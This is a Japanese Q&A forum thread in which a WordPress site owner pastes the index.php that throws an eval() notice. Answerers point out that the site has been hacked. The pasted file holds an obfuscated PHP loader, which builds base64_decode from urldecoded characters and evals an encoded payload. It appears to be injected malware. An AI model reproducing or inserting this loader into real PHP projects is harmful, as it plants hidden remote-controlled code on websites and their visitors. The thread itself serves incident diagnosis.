質問をすることでしか得られない、回答やアドバイスがある。

15分調べてもわからないことは、質問しよう!

新規登録して質問してみよう
ただいま回答率
85.50%
WordPress

WordPressは、PHPで開発されているオープンソースのブログソフトウェアです。データベース管理システムにはMySQLを用いています。フリーのブログソフトウェアの中では最も人気が高く、PHPとHTMLを使って簡単にテンプレートをカスタマイズすることができます。

PHP

PHPは、Webサイト構築に特化して開発されたプログラミング言語です。大きな特徴のひとつは、HTMLに直接プログラムを埋め込むことができるという点です。PHPを用いることで、HTMLを動的コンテンツとして出力できます。HTMLがそのままブラウザに表示されるのに対し、PHPプログラムはサーバ側で実行された結果がブラウザに表示されるため、PHPスクリプトは「サーバサイドスクリプト」と呼ばれています。

Q&A

解決済

2回答

543閲覧

Notice: Undefined index eval()'d code(1) : eval()'d code on lineエラー解決の為にeval()を他の書き方で置き換えたい

yukki-1227

総合スコア47

WordPress

WordPressは、PHPで開発されているオープンソースのブログソフトウェアです。データベース管理システムにはMySQLを用いています。フリーのブログソフトウェアの中では最も人気が高く、PHPとHTMLを使って簡単にテンプレートをカスタマイズすることができます。

PHP

PHPは、Webサイト構築に特化して開発されたプログラミング言語です。大きな特徴のひとつは、HTMLに直接プログラムを埋め込むことができるという点です。PHPを用いることで、HTMLを動的コンテンツとして出力できます。HTMLがそのままブラウザに表示されるのに対し、PHPプログラムはサーバ側で実行された結果がブラウザに表示されるため、PHPスクリプトは「サーバサイドスクリプト」と呼ばれています。

0グッド

0クリップ

投稿2023/04/04 01:52

実現したいこと

  • index.phpの2行目のデコード化部分のeval()がエラーを吐いているので、該当コード部分を他の書き方で置き換えたい

前提

wordpressバージョン6.2でサイトを作っていたところ本日突然サイト上部に
Notice: Undefined index eval()'d code(1) : eval()'d code on line2というエラー文が表示され
index.phpに該当エラーコードがあったのでeval()を含む2行目を丸ごと削除しエラー文は消え現段階でサイト上に何の問題も起きてないように見えますが、
調べてみるとデコードという作業をやっていたコードらしく削除したことで今後何らかの問題が起きないか心配ですが
コードが長すぎだったり知識不足で参考サイトを見ても手に負えません。

該当のソースコード

index.php

1<?php 2$a='fgss207';$O00OO0=urldecode("%6E1%7A%62%2F%6D%615%5C%76%740%6928%2D%70%78%75%71%79%2A6%6C%72%6B%64%679%5F%65%68%63%73%77%6F4%2B%6637%6A");$O00O0O=$O00OO0[3].$O00OO0[6].$O00OO0[33].$O00OO0[30];$O0OO00=$O00OO0[33].$O00OO0[10].$O00OO0[24].$O00OO0[10].$O00OO0[24];$OO0O00=$O0OO00[0].$O00OO0[18].$O00OO0[3].$O0OO00[0].$O0OO00[1].$O00OO0[24];$OO0000=$O00OO0[7].$O00OO0[13];$O00O0O.=$O00OO0[22].$O00OO0[36].$O00OO0[29].$O00OO0[26].$O00OO0[30].$O00OO0[32].$O00OO0[35].$O00OO0[26].$O00OO0[30];eval($O00O0O("JE8wTzAwMD0iT3BFSWthbEN6eFNyanZieUZadExWc0dCUVRSdUtnY0F3aVdxbkpZUG9VRGhNWEhObWVmZG5Ub0xwUldldG14UWtJellNSHlxQWR3akpaRkJEUEVyT2NTVlhpc0NnVXVsYXZOR2hiZktDdTlPUk5yRGl3bzlpMkhYRTNhWWF1RVhuMGp0SHZGZkt3V3lIQTlkUlMxVEtlUHRHa3JPRFp5cEhTSFR6aFVnTFdFY3FlS2dLTkZPbmM4SUhoS3RFdExPR1k1bEsyTTVLMk1CS2U1WUt4RVRuMkZXSGhXQkh4UGNBeExkSDJBMEt4UFREWnloS1M1a0t3V0l6Y2pRRGVGY0R2eVlIdkYxRWg1cmlNOVpGQWlTRkFpeml3aUtDWUZmVTBBeEFwQXhTWUZjdlpnY0xreTlId0FoUlM1V0RlaVpMY21RRGVpSnhNamZVMEFhRmNMVERaeXBIU0hUemhVZ0xwc2NxTkcwRVhqSUVZbFpxZWlUemhGV2JlNU9STnJjRHhvOUNTSGx6TkdXaWNIdEtOaU96M2FnQXhtWkRaMDlDU0hsek5HV0MzaTBFaFd5RE1hZExoV0JId0E0cVhqZ0VlTFRuV2FUbllGcEN4RmZVcEFGQVVBWkFNZGNFZWlLbllGaENTbTBFaFd5RE1VZEZjcDdSU3NnaXdKbEN4TGNEeEZoQ3ZqWUhTS2ZFaEFPendNa0h4UGNKZWxFQzNtRWljV09DeExCaXdKQkxwcmNxZUxjcWVGaERaeXBIU0hUemhVZ0xXVVlMY21PRWhBWHYzaVdFd21sczJVZ0xjR2J2TUVRTFlMZExjTGRpd3NURFpkcFJ1MVFEZUtMQU1GSnYxQVpGQWlmSlVLTVpXSlhEWnloS1M1a0t3V0l6Y2pYSHZGMURlVzdpd2Q5UllQY1VwQUZBVUFaQU05QVVwcGNEWnlUSGNsV3p2ajBieFBwUllwVGJZRmRDU2RnaTJNWUgzc1hEWmRwUnQxWnFjRS9pWTRnUnZHZnN2aVlzdnBnaXdPVENZRmRTdGpLbmhkZ2kxTUFGQWlIdjFHVVVwV25GWUVURFp5OUVoQTBLdmlCTGVGUW4zMWhLUzVrS3dXSXpjalRFMTlnS05GT0VZUFRiMldoRGVNV3p2ajBieFBwdjFHTVVXSE1VV2RYeE1GVVVNYVh2eHBoaVhHMEVYRkl6dzkzSHZMZ2lNOVpGQWlTRkFpemkwbFVBTWpaaTEwVExaMDlpMjloSGNFVGIzaVdLTkFZemNqMEVYQVduMzFXek5HV1JTc2dMU0F5RU5GNURlRmZVMEF4QXBBeFNZS0xBTUZKdjFsZkZwOXhBME14Rm9Bb3YxanhaMUZDaTEwVGljc3B2MUdNVVdITVVXZFh4TUZVVU05c3YwSENVV0tqVXBGTUZNOUpVcDlVWllLS0NaMDlpMmwwS05qdGlZVzdFaEEwS3ZpQkxORllLU1U3ZlNBZEUyQVRIY1BsSFMxT0tOcGdpTTlaRkFpU0ZBaXppMGxVQU1qZkZXaUNaV0ZmRlU1b3YwbFVBTWpaaTEwVGljSHRLTmkwejJtSUsyQVlEZUZmVTBBeEFwQXhTWUtMQU1GSnYwSHhaMDVVdjBBbkZNOUxBTUZKVVlLS0R4bzlDeEtJSGhzWER2eVlIdkYxRWg0UEtOaTFIWnk5RWhBMEt2aUJMd0hsek5HV24zMWhLUzVrS3dXSXpjalhIdkZmUnZyZ0R2ZHBFdTBwdjFHTVVXSE1VV2RYVXBBR1oxRk12ME1vRk1MWHZaeVRIY1BsSFMxT0tOcGdpTTlaRkFpU0ZBaXppMGxVQU1qZkowbWlGVTVVdjBXSmkxMFREdmRwRXUwcHYxR01VV0hNVVdkWHhNRlVVTTl1Wm9XTVpXRmZ4QXJYdlp5OUhTbXRIU1doRGVNV3p2ajBieFBwdjFHTVVXSE1VV2RYeE1GVVVNOXN2MEhDVVdLalVwRk1GTTl3WjFMWHZ4cFRiWUZPQ3hGZlUwQXhBcEF4U1lLTEFNRkp2MWxmRnA5eEEwTXhGb0FvdjBIQ1VjS0tuMzFUSGNsdEtOaVRFM0ZZRGVGT3FlRWRpWXBUYllGMENTQTRFd21JSHdVZ0xjT2NxZUZPRFpkcEV1MHBLTWRPdlp5OUVoQTBLdmlCTGVGT24zMWhLUzVrS3dXSXpjamdLTkZPRGVGMXFlRmhIY1c3aXdLWEN4aTBIdmwwcTJsMHpTT2NuMldoRE5HMEVYaklFWWxBYWNPY0V3V0JIM0dUS3dBeXN2cmNEWjA5Q1NIbHpOR1dpY3NnRTNGWUV3OXRETVVZcWVMQmJ3MWRMY3BsQ1oxaHNTbXRIdm04RTNGWUV3OXRETVVZcWVMSUhoQVdIZUxUTFowOUhoTWRFMlVURHZkcEgyRTlMWEZXYk5KSWJ3MWRMa3k5SFNtdEh4alRIY2x0S05pT3ozYWdBWkxkTGM1MGJOSmNEeG85Q1NIbHpOR1dEdmRwSDJFOUxYRldiTkpJRXdtbFJTNGNuMzFXek5HV0x3V2hETkcwRVhqSUVZbEFhY09jUlMxbEgyQXRxWUxUTFowOUhoTWRFMlVUYllGWEh0MGNSUzFsSDJVSUsyQWNFZUw3ZlNBZEUyVVBSU3NnRTNGWUV3OXRETVVZcWVpdFJ2Rld6U01PcVhsdHplTFRMWjA5SGhNZEUyVVRiWUZYSHQwY0t3QTRLZTlrRTNhY24zMWdIU01wSHZMZ0xoR0l6WEZXelhKeUtOV09IWmdQaXdLWG5ZamtSd01ZRTJBMENBQVVGYzA0TGNwN2l3bGdDU2wwS05qZnNYQVR6d0ZmRXZBV0VYcGdpd0hoRFpkcFJTcDlBWTRwS3g0Y0NZTEJpd2xnbllGVlJrMXJIaFdkSEE5WEh2RmZzMjlCS3dBQktOYWdpd1dURFp5VEhjUGxpd1RWRHhGVlJrMWtETUVCaU5VZGl3bGdxdXJUbjJXaERlb3BSaGdUaXdUVkNTYWdBWTRwS3hPcFJ3UGRheHA3UlNzZ0x4RlZSY1c3aXd5UUNVamh6M2pXemNQcFJTcGRpM0xYRFp5VEhjUHBSMmRUYjNHMEVoQWx6QTlYSHZGZnpTQTBzQTlwc3ZGbERlRlFSWXA3aXdtZEN4TGNuM0tnUlNtV0RlTWhIUzloRGVGUVJZcFRiWUZkemU0OUhoS1dLTmFnaXd5UXF1b09ha0pUbjMxaHMybUlFMlVnaXd5UURaeVlIdkYxRWg0UGl3bWRuMzE5RWhBMEt2aUJMZUZWUmt5OUhYQUJzM0ZUejI0UHNZUHBLeE9wUndQZGl3MXlEdmRwemg0OXMzQVl6TTlUemhXMERlcDdSU3NnaXcxeUR2eWtLdmlkdjNHV0t3OU9LZVBwemg0ZEoxQXhabzlKQU05QVVwT2RpTlVUbjJHMUVobWZFMkEwejNqMERlRkJ6Y211QUFpYVoxalV2MWpDVTFKZGF4cDdzM0FZek05dEh2RklFTkpnaXc1QnFvR0FVcG1DVU1GZlVvOVpBb0hpRlVtb1VZT3BSd1BUbjMxV3pOR1diMkcxRWhtZkUyQTB6M2owRGVGQnpjbXVBQWlhWjFqVXYxQXhaZU9wS3g0Y0NZTEJpd2xnRFp5OXMzQVl6TTl0SHZGSUVOSmdpdzVCcW9HQVVwbUNVTUZmVXBBVUFBaW5BTWlqWldHd0ZBTGRheHA3czNBWXpNOXRIdkZJRU5KZ2l3NUJxb0dBVXBtQ1VNRmZ4b0FqRm9BeHF1clRuMkcxRWhtZkUyQTB6M2owRGVGQnpjbXVBQWlhWjFqVXYxRmlaVUFDQUFKZGFaclRuMkcxRWhtZkUyQTB6M2owRGVGQnpjbXVBQWlhWjFqVXYwSENab21DQTBtQ0owTVV4VTlucXVvVG5ZRlZSazFrS3ZpZHYyQTRIU2FnaXc1QkRaeWtLdmlkdjJHZHozR1dEZUZCemNwN0VoQTBLdmlCTGVGVlJreTlIWEFCczNGVHoyNFBIWVBwS3hPcEhoc1RiWUZWUmsxZ0tORk9EZUYxcWVGaEhjcDdSU3NnTHhGVlJjVzdKd2xXc1NGV0VjUFh4TUZVVWU4bXFrb1BHWnJPTG9XQkt3QVl6aE1kTE1HV0VYSFdFY2pNRVhpSUVjRVRuMkZUSHhQVG4zMHBzazF0S1NpdEtOTGdpd1RWcXVyZGF4cDdFM0tUS3dHZ0RlRmNEdnlrc3ZHV0xlTDBMa1RyUndBbEh3QVlEZUtMQU1GSnF0b0JheHIwYXVKUFpoOTBMb0hJS1M1cGlZcDdId1dXRGVwN3MyTXRIeHJjR3hMNkp3bFdzU0ZXRWNQWHhNRlVVZThtcWtvUEdack9Mb1dCS3dBWXpoTWRMTUdXRVhIV0Vjak1FWGlJRWNFVG4yRlRIeFBUbjJHbEUyVVBMa2FjbnBqZ0hTTXBIdkxnaTBsVUFNcklheDRtTHVhT2Fjakd6M0hXSGVqSkh2aXlzUzVXelhGZGJ4RVRuMmxXc1NGV0VjUFhadzlrc3ZGVHoyNDZMZUVCRTNBY0UzRllEZUZWUmNPbUR4cDdSd0FsSHdBWURlS1lIU0hXRWhBWW5jclhxaGRnTHBsVUFNamZ4bzlaQWVMVERaeXBSU1VnRFp5a3N2R1dMZUwzTGtUWUh2RjFFaDRQSGhNZEUyVTdzMk10SHhyY25lTDZId1dXRGVwN0h3QWhzdkFkS3VUZ0hTTXBIdkxnaTBsVUFNcklheDRtTHVMT2FlakN4WUVUbjNpV0tOQVl6Y3JwUmhnN2Z2MVRIY2x0S05pT3ozYWdBeE9jUlhyWWF1THRMY3BsQ1oxaHNTbXRIeFc3SFNHZ3pZcmNDTnIreFdyWWF1THRDZTlPQ2ttT0NjTEJpd29CTGMxY0hTTTFLd1doS1NPOHEzcitMa3lwUlNVZ0RaeTlpdzlJQ1NNWUVoTTVEZWlURWVMOUNoS1dLTTlURWVQVHFlaWRzUzVYTGswK1JZUGN4TUZVVU05akowR01VTUZmWm9NbkYxQWpGMFVjRHhPY0tTb2NDWjRwUmVPY0VjTDlDWEcwRVhGSXp3OTNIdkxnUllQY3hNRlVVTTl4RlVITVVwQXhMY3BUcWVpZ3ozRzBMazArUllQY3hNRlVVTTlMWjFHVUxjcGRMWEFZUnhMOUNXVWRMWEFZUlpMY0NaNUFhY09jUnZHZXozSmNDWjVPRWhBWHYyMWxLd0dnRGVpckgyOUlIMm1XZk5XbFJ3OUlmd2lUemhLckxjT3BSZXAvTGtvY25jTGNxZWloTGswK0ZjT2NFZUw5Q2NGcERaeVRIY2xURTE5Z0tORk9FWVBURHZkcHoyOXpMaFBjdlowY2F4TDdmU1doRE5HMEVYaklFWWxBcWVpT1JTNVhFMlcwSFMxbEVlTFRMWjA5SGhNZEUyVVRiWUZPRXUxV2JOamR6MkZXRGVMZExjbVhEZUxJRTJXMEhTMWxFZTVkUnZHMExjT3B6MjhURFp5aHozaVdzU0dnRGVGT0VlamxFWXJwRXZvVGJZRmhIazBYUk5GMEVOYTZxWTkzSzNFQkgyOUlIMm1XcWhHSXp4OU9SUzVYQzNHVEt3QXlzdnI5aVk0cEV2bzdpd1RWQ1NhZ2l3SGhxd01ZRWhNNURlcGRhZXA3UlNzZ0x4RlZSY1c3aXdUVkNVamhSU21XdjJLV0tNOWt6MjUwSFM1MEVZUHBIaHNUbjMxVEhjbHRLTmlURTNGWURlRlZSY09YRTNBa3MyQXRFMkgxendtNWlZcFRiMkFrUnc4UGl3SGhxY0U4c1hMK0V3V0JIMjlRQ3dpWUNjRTdmU0FkRTJBN0hTR2d6WXJwSGhzQml0MDlDWjA5Q1NHWUhTTTBMd0hUendVUEhoTWRFMlVsQ3dpWUNjRTdmdjFwUlNVZ0RaeTlpTmlZQ1NFZ0xjTGRpdzlJRFp5VEhjUHBFWExUSHdXV0RlRllFY3A3Q3Q0PSI7ZXZhbCgiPz4iLiRPMDBPME8oJE8wT08wMCgkT08wTzAwKCRPME8wMDAsJE9PMDAwMCoyKSwkT08wTzAwKCRPME8wMDAsJE9PMDAwMCwkT08wMDAwKSwkT08wTzAwKCRPME8wMDAsMCwkT08wMDAwKSkpKTs=")); 3?> 4<?php 5/** 6 * Front to the WordPress application. This file doesn't do anything, but loads 7 * wp-blog-header.php which does and tells WordPress to load the theme. 8 * 9 * @package WordPress 10 */ 11 12/** 13 * Tells WordPress to load the WordPress theme and output it. 14 * 15 * @var bool 16 */ 17define( 'WP_USE_THEMES', true ); 18 19/** Loads the WordPress Environment and Template */ 20require __DIR__ . '/wp-blog-header.php';

試したこと

https://stackoverflow.com/questions/60421192/php-code-injection-by-hack-which-begins-with-o00oo0-base64-decode-so-i-did-dec
https://www.jb51.net/article/195521.htm
など参考にしましたが自身の技術不足と外国語なこともあり手に負えない状況です。
どなたかお助け下さい。

補足情報(FW/ツールのバージョンなど)

PHP バージョン 7.4.33

気になる質問をクリップする

クリップした質問は、後からいつでもMYページで確認できます。

またクリップした質問に回答があった際、通知やメールを受け取ることができます。

バッドをするには、ログインかつ

こちらの条件を満たす必要があります。

guest

回答2

0

「今後」ではなくすでに攻撃されている。そのコード自体が不正なアクセスによって勝手に書き換えられたもの。
作ってる段階ならデータベースまで含めて全部削除してやり直しが必要。

何も分かってない初心者が設置したWPへの攻撃は常に来ているので対策が分からないならWPを使うのは避けるべき。

投稿2023/04/04 02:16

kawax

総合スコア10377

バッドをするには、ログインかつ

こちらの条件を満たす必要があります。

0

ベストアンサー

状況がよくわかりませんが、以前の質問が参考になるかもしれません。
サーバーがクラックされて改ざんされている可能性があります

投稿2023/04/04 02:12

yambejp

総合スコア114572

バッドをするには、ログインかつ

こちらの条件を満たす必要があります。

yukki-1227

2023/04/07 07:37

お二方ありがとうございました。 調べたら確かにウイルス感染していました
guest

あなたの回答

tips

太字

斜体

打ち消し線

見出し

引用テキストの挿入

コードの挿入

リンクの挿入

リストの挿入

番号リストの挿入

表の挿入

水平線の挿入

プレビュー

15分調べてもわからないことは
teratailで質問しよう!

ただいまの回答率
85.50%

質問をまとめることで
思考を整理して素早く解決

テンプレート機能で
簡単に質問をまとめる

質問する

関連した質問